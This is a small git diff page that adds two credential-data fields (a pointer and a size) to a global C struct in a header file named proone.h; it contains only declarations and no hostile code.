diff options
Diffstat (limited to 'src/proone.h')
-rw-r--r-- | src/proone.h | 2 |
1 files changed, 2 insertions, 0 deletions
diff --git a/src/proone.h b/src/proone.h index c40a1b1..49e9d9c 100644 --- a/src/proone.h +++ b/src/proone.h @@ -6,6 +6,8 @@ struct proone_global { + uint8_t *host_cred_data; + size_t host_cred_size; bool has_proc_lim_lock; bool bin_ready; int caught_signal; |